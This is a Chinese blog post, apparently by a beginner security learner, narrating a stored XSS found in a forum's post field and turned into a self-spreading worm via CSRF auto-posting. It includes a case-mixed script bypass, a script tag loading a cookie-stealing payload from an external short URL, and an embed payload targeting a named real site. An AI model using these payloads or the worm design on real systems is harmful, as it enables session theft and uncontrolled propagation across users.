<!DOCTYPE HTML>
<html>

<head><meta name="generator" content="Hexo 3.8.0">
	<link rel="bookmark" type="image/x-icon" href="/img/logo_miccall.png">
	<link rel="shortcut icon" href="/img/logo_miccall.png">
	
			    <title>
    Kaler
    </title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <link rel="stylesheet" href="/css/mic_main.css">
    <link rel="stylesheet" href="/css/dropdownMenu.css">
    <meta name="keywords" content="Kaler">
    
    	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	 
    <noscript>
        <link rel="stylesheet" href="/css/noscript.css">
    </noscript>
    <style type="text/css">
        body:before {
          content: ' ';
          position: fixed;
          top: 0;
          background: url('/img/bg.jpg') center 0 no-repeat;
          right: 0;
          bottom: 0;
          left: 0;
          background-size: cover; 
        }
    </style>

			    
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script async type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


    <script src="/js/jquery.min.js"></script>
    <script src="/js/jquery.scrollex.min.js"></script>
    <script src="/js/jquery.scrolly.min.js"></script>
    <script src="/js/skel.min.js"></script>
    <script src="/js/util.js"></script>
    <script src="/js/main.js"></script>
	
</head>
    
		
<!-- Layouts -->



<!--  代码渲染  -->
<link rel="stylesheet" href="/css/prism_coy.css">
<link rel="stylesheet" href="/css/typo.css">
<!-- 文章页 -->
<body class="is-loading">
    <!-- Wrapper 外包 s-->
    <div id="wrapper" class="fade-in">
        <!-- Intro 头部显示 s -->
        <!-- Intro 头部显示 e -->
        <!-- Header 头部logo start -->
        <header id="header">
    <a href="/" class="logo">Go TOP</a>
</header>
        <!-- Nav 导航条 start -->
        <nav id="nav" class="special">
            <ul class="menu links">
			<!-- Homepage  主页  --> 
			<li>
	            <a href="/" rel="nofollow">主页</a>
	        </li>
			<!-- categories_name  分类   --> 
	        
	        <li class="active">
	            <a href="#s1">分类</a>
	                    <ul class="submenu">
	                        <li>
	                        
	                    </li></ul>
	        </li>
	        
	        <!-- archives  归档   --> 
	        
	        
		        <!-- Pages 自定义   -->
		        
		        <li>
		            <a href="/about/" title="简历">
		                简历
		            </a>
		        </li>
		        
		        <li>
		            <a href="/group/" title="团队">
		                团队
		            </a>
		        </li>
		        
		        <li>
		            <a href="/gallery/" title="图库">
		                图库
		            </a>
		        </li>
		        
		        <li>
		            <a href="/tag/" title="标签">
		                标签
		            </a>
		        </li>
		        


            </ul>
            <!-- icons 图标   -->
			<ul class="icons">
                    
                    <li>
                        <a title="github" href="https://www.Kaleryou.github.io" target="_blank" rel="noopener">
                            <i class="icon fa fa-github"></i>
                        </a>
                    </li>
                    
                    <li>
                        <a title="Game" href="/www.4399.com" target="_blank" rel="noopener">
                            <i class="icon fa fa-Game"></i>
                        </a>
                    </li>
                    
			</ul>
</nav>

        <div id="main">
            <div class="post_page_title_img" style="height: 25rem;background-image: url(https://ss0.baidu.com/6ONWsjip0QIZ8tyhnq/it/u=263547879,3429131590&amp;fm=175&amp;app=25&amp;f=JPG?w=640&amp;h=1080&amp;s=75BB3FD3323327805E208C97030050C3);background-position: center; background-repeat:no-repeat; background-size:cover;-moz-background-size:cover;overflow:hidden;">
                <a href="#" style="padding: 4rem 4rem 2rem 4rem ;"><h2>XSS蠕虫分析</h2></a>
            </div>
            <!-- Post -->
            <div class="typo" style="padding: 3rem;">
                <blockquote>
<p>这个是学习XSS最快的一个时间，没错，就是一个。前后大概只有3，4天，可能是作为初学者第一次挖到高危漏洞，比较在此之前还是个连反射型XSS都搞不明白利用手法，也几乎有防御策略就绕不过的菜鸟。心情比较激动，学习效率高了不知道多少倍。之所以说学习，是因为其中作为安全初学者夹杂的XSS,CSRF,JS脚本等混合使用的学习。至于跟谁学，当然是狗林了。他今天骂我狗管理，我决定狗林这个词将根深蒂固。</p>
<p>居然已经快八点了，下班了，明天更，今天不希望见到亚索。</p>
</blockquote>
<h2 id="XSS蠕虫"><a href="#XSS蠕虫" class="headerlink" title="XSS蠕虫"></a><strong>XSS蠕虫</strong></h2><h3 id="大体思路"><a href="#大体思路" class="headerlink" title="大体思路"></a>大体思路</h3><p>1、在发帖的内容处发现了存储型XSS</p>
<p>2、对帖子(母贴)的内容进行构造，插入CSRF POC，并对其中内容输出为302永久重定向到母感染贴</p>
<p>3、所有浏览此页面的用户都会自动发布一个重定向到母感染贴的子贴，重定向到母贴时又再次执行母贴中的POC再次创建一个子贴。</p>
<blockquote>
<p>以上就是XSS+CSRF构造蠕虫大体的思路，下面细化各个步骤的过程，水平不高，适合XSS初学者的进阶</p>
</blockquote>
<h3 id="一、存储型XSS"><a href="#一、存储型XSS" class="headerlink" title="一、存储型XSS"></a>一、存储型XSS</h3><p>1、进入发帖处，添加初步测试payload，并查看源码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">111&lt;script&gt;&lt;SCrIpt&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/Kaleryou/kaleryou.github.io/blob/master/tupian/1.jpg?raw=true" alt="1.jpg"></p>
<p><img src="https://github.com/Kaleryou/kaleryou.github.io/blob/master/tupian/2.jpg?raw=true" alt="2.jpg"></p>
<p>2、观察到可以大小写混淆绕过，于是构造payload（对于屏蔽括号的可以用 ’ 来代替）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;sCrIpt&gt;alert&apos;xss&apos;&lt;/sCrIpt&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/Kaleryou/kaleryou.github.io/blob/master/tupian/3.jpg?raw=true" alt="3.jpg"></p>
<p>3、刷新页面观察效果，成功弹窗</p>
<p><img src="https://github.com/Kaleryou/kaleryou.github.io/blob/master/tupian/4.jpg?raw=true" alt="4.jpg"></p>
<p>4、插入JS脚本，利用XSS平台窃取用户cookie，这是最常用的XSS利用手法。</p>
<p>POC：</p>
<p>&lt;sCRiPt/SrC=//60.wf/m5VP&gt;</p>
<blockquote>
<p>SRC引用的是短地址，内容为窃取用户cookie的JS脚本，详细可以使用XSS平台自动生成</p>
</blockquote>
<p><img src="https://github.com/Kaleryou/kaleryou.github.io/blob/master/tupian/5.jpg?raw=true" alt="5.jpg"></p>
<h3 id="二、XSS配合CSRF的初步测验"><a href="#二、XSS配合CSRF的初步测验" class="headerlink" title="二、XSS配合CSRF的初步测验"></a>二、XSS配合CSRF的初步测验</h3><p>1、首先验证是否存在CSRF，同样在发布新贴处，填写标题内容，点击发布抓包</p>
<p><img src="https://github.com/Kaleryou/kaleryou.github.io/blob/master/tupian/6.jpg?raw=true" alt="6.jpg"></p>
<p>2、burp自带的生成CSRF POC，POST包处-》右键-》generate  csrf poc  -》保存-》使用另一个账号发送POC，查看自己的帖子，发现成功发送新帖。</p>
<p>3、编写JS脚本(可以利用Xss’or来生成)</p>
<p><img src="https://github.com/Kaleryou/kaleryou.github.io/blob/master/tupian/7.jpg?raw=true" alt="7.jpg"></p>
<p>4、CSRF+存储型XSS将脚本插入到页面中</p>
<p><img src="https://github.com/Kaleryou/kaleryou.github.io/blob/master/tupian/8.jpg?raw=true" alt="8.jpg"></p>
<p>如图，内容为发布新帖的JS脚本，点击发布，就生成了新帖</p>
<p>5、浏览此贴，提示成功</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/9.jpg" alt="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/9.jpg"></p>
<p>6、可以看到成功发布出去</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/10.jpg" alt="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/10.jpg"></p>
<p>7、使用其他用户浏览帖子测试—-发现同样不知觉的发了个新帖，至此，XSS+CSRF的攻击已经完成</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/11.jpg" alt="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/11.jpg"></p>
<h3 id="三、蠕虫的构造"><a href="#三、蠕虫的构造" class="headerlink" title="三、蠕虫的构造"></a>三、蠕虫的构造</h3><p>再整理一下思路</p>
<p>蠕虫的前提是子贴的内容，即点击我们母感染贴的用户所发布的子贴的内容是可控的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">1、攻击者创建一个攻击帖（母帖），贴中JS脚本包含</span><br><span class="line"></span><br><span class="line">  ①创建一个子回传帖</span><br><span class="line"></span><br><span class="line">  ②子回传帖的内容是重定向到母帖</span><br><span class="line"></span><br><span class="line">2、用户浏览母帖，然后自动创建一个子回传帖。</span><br><span class="line"></span><br><span class="line">3、子回传帖403重定向到母帖</span><br><span class="line"></span><br><span class="line">4、根据内容又创建一个子回传帖</span><br><span class="line"></span><br><span class="line">5、用户之间互相浏览，发散，传播，不拉不拉不拉，造成蠕虫攻击</span><br></pre></td></tr></table></figure>
<p>1、任意发表新帖</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/14.jpg" alt="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/14.jpg"></p>
<p>2、记录帖子的URL并点击编辑</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/15.jpg" alt="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/15.jpg"></p>
<p>3、插入JS脚本，其中控制子回传贴302重定向到母贴的URL</p>
<p>payload：&lt;embed/src=/bang.duia.com/web/normal/topic/806440&gt;</p>
<p>意为在页面中插入一个新页面，这个新页面为母贴。</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/13.jpg" alt="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/13.jpg"></p>
<p>4、发布后浏览，已生成子回传贴</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/16.jpg" alt="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/16.jpg"></p>
<p>5、打开子回传贴，发现了在母贴JS脚本中构造的框架</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/17.jpg" alt="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/17.jpg"></p>
<p>6、虽然没有报WAF拦截。但是在FireFox却很遗憾没有成功，打开Network发现了这样一个提示。意为无效的CORS（跨域资源共享）请求。猜测此处应该是属于白名单拦截，限制了JS的入口。</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/18.jpg" alt="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/18.jpg"></p>
<p>7、通过IE可以运行</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/19.jpg" alt="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/19.jpg"></p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/20.jpg" alt="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/20.jpg"></p>
<p>8、重点！！这些都不是最重要的，因为这是一个APP，所以用户基本上是依赖手机端来运行。之后在手机端上查看帖子成功通过子回传URL重定向到母贴并创建了一个新的子回传贴。虽然 网站可能有WAF， 电脑端IE可以蠕起来，但是发现，app端 没有做任何防护，直接可以传播。</p>
<p><img src="https://github.com/Kaleryou/kaleryou.github.io/blob/master/tupian/21.png?raw=true" alt="21.png"></p>
<p><img src="https://github.com/Kaleryou/kaleryou.github.io/blob/master/tupian/22.png?raw=true" alt="22.png"></p>

            </div>

            <!-- Post Comments -->
            
    <!-- 使用 DISQUS_CLICK -->
<div id="disqus-comment">
    <div id="disqus_thread"></div>

<!-- add animation -->
<style>
	.disqus_click_btn {
            line-height: 30px;
            margin: 0;
            min-width: 50px;
            padding: 0 14px;
            display: inline-block;
            font-family: "Roboto", "Helvetica", "Arial", sans-serif;
            font-size: 14px;
            font-weight: 400;
            text-transform: uppercase;
            letter-spacing: 0;
            overflow: hidden;
            will-change: box-shadow;
            transition: box-shadow .2s cubic-bezier(.4, 0, 1, 1), background-color .2s cubic-bezier(.4, 0, .2, 1), color .2s cubic-bezier(.4, 0, .2, 1);
            outline: 0;
            cursor: pointer;
            text-decoration: none;
            text-align: center;
            vertical-align: middle;
            border: 0;
            background: rgba(158, 158, 158, .2);
            box-shadow: 0 2px 2px 0 rgba(0, 0, 0, .14), 0 3px 1px -2px rgba(0, 0, 0, .2), 0 1px 5px 0 rgba(0, 0, 0, .12);
            color: #fff;
            background-color: #7EC0EE;
            text-shadow: 0
        }
</style>
	
<div class="btn_click_load" id="disqus_bt"> 
    <button class="disqus_click_btn">点击查看评论</button>
</div>

<!--
<script type="text/javascript">
$('.btn_click_load').click(function() {
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'http-miccall-tech'; // required: replace example with your forum shortname

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
      var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();

    document.getElementById('disqus_bt').style.display = "none";
});
</script>
-->
<script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'http://yoursite.com/2018/11/26/分享一个XSS蠕虫/';  // Replace PAGE_URL with your page's canonical URL variable
        this.page.identifier = 'http://yoursite.com/2018/11/26/分享一个XSS蠕虫/'; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
    };
</script>

<script type="text/javascript">
    $('.btn_click_load').click(function() {  //click to load comments
        (function() { // DON'T EDIT BELOW THIS LINE
            var d = document;
            var s = d.createElement('script');
            s.src = '//http-miccall-tech.disqus.com/embed.js';
            s.setAttribute('data-timestamp', + new Date());
            (d.head || d.body).appendChild(s);
        })();
        $('.btn_click_load').css('display','none');
    });
</script>
</div>
<style>
    #disqus-comment{
        background-color: #eee;
        padding: 2pc;
    }
</style>


        </div>
        <!-- Copyright 版权 start -->
                <div id="copyright">
            <ul>
                <li>&copy;Powered By <a href="https://hexo.io/zh-cn/" style="border-bottom: none;">hexo</a></li>
                <li>Design: <a href="http://miccall.tech " style="border-bottom: none;">miccall</a></li>
            </ul>
            
                <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
			
        </div>
    </div>
</body>



 	
</html>
